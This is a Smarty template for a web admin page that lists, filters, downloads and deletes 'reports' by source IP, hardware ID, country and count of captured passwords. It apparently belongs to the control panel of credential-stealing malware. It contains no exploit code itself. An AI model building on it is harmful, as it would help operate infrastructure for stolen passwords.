{if {$smarty.request.routine|default:''} == 'confirm_clear_reports'} {assign var='msg' value="Are you sure you want to delete all reports?"} {assign var='yes_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=reports&routine=clear_reports"} {assign var='no_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=reports"} {include file='confirm.tpl'} {/if} {if $smarty.request.filter_string|default:'' != '' || $smarty.request.filter_ip|default:'' != '' || $smarty.request.filter_hwid|default:'' != '' || $smarty.request.filter_nonparsed|default:'' != '' || $smarty.request.filter_has_passwords|default:'' != ''}

Attention! The filter mode is activated. Disable.


{/if} {if $priv_can_delete} Download all reports ({$total_reports_count} {$total_reports_count|items}, {$total_report_table_size|file_size})
Download unprocessed reports ({$total_nonparsed_reports} {$total_nonparsed_reports|items}, {$total_nonparsed_report_size|file_size})
Delete all reports ({$total_report_table_size|file_size})
{/if} Show Filter

{if count($report_list)} {foreach from=$report_list item=report_item} {if $report_item.report_id == ''} {else} {if $report_item.report_id == '0' || $report_item.report_id == ''} {/if} {/foreach}
Report IP Add time Processed The size Passwords
$report_item.report_idOpen {country base_path="includes/design/images/flags/" country_code=$report_item.report_country simple='1'} {$report_item.report_source_ip} {$report_item.import_time} {$report_item.parsed|yes_no} {$report_item.report_len|file_size} {$report_item.count}

{if $paginate.page_total gt 1}
{paginate_prev} {paginate_middle link_prefix=" " link_suffix=" |" format="page" prefix="" suffix=""} {paginate_next}
{/if} {/if}